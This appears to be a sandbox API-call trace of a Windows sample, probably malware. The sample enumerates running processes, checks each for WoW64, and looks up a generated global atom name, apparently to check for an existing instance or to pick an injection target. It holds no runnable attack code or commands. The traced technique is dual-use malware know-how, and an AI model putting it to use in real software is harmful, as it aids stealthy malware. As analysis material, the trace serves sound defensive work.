	[0097.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.755] CloseHandle (hObject=0x248) returned 1
	[0097.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.755] CloseHandle (hObject=0x248) returned 1
	[0097.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.755] CloseHandle (hObject=0x248) returned 1
	[0097.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658e68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.756] CloseHandle (hObject=0x248) returned 1
	[0097.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.756] CloseHandle (hObject=0x248) returned 1
	[0097.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.756] CloseHandle (hObject=0x248) returned 1
	[0097.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658f08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.757] CloseHandle (hObject=0x248) returned 1
	[0097.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.757] CloseHandle (hObject=0x248) returned 1
	[0097.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.757] CloseHandle (hObject=0x248) returned 1
	[0097.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.758] CloseHandle (hObject=0x248) returned 1
	[0097.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c90, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.758] CloseHandle (hObject=0x248) returned 1
	[0097.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.758] CloseHandle (hObject=0x248) returned 1
	[0097.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.759] CloseHandle (hObject=0x248) returned 1
	[0097.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658f88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.759] CloseHandle (hObject=0x248) returned 1
	[0097.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.759] CloseHandle (hObject=0x248) returned 1
	[0097.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658da8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.760] CloseHandle (hObject=0x248) returned 1
	[0097.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.760] CloseHandle (hObject=0x248) returned 1
	[0097.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658970, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.760] CloseHandle (hObject=0x248) returned 1
	[0097.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.761] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.762] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.762] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] GetLastError () returned 0x5
	[0097.762] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.763] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetLastError () returned 0x5
	[0097.764] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.764] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.764] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.764] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.764] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.765] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.765] CloseHandle (hObject=0x248) returned 1
	[0097.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fea8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.765] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.765] CloseHandle (hObject=0x248) returned 1
	[0097.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65adb8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.766] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.766] CloseHandle (hObject=0x248) returned 1
	[0097.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16778) returned 0xc0000004
	[0097.836] VirtualAlloc (lpAddress=0x0, dwSize=0x16878, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16878, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ac98, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.844] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.844] CloseHandle (hObject=0x248) returned 1
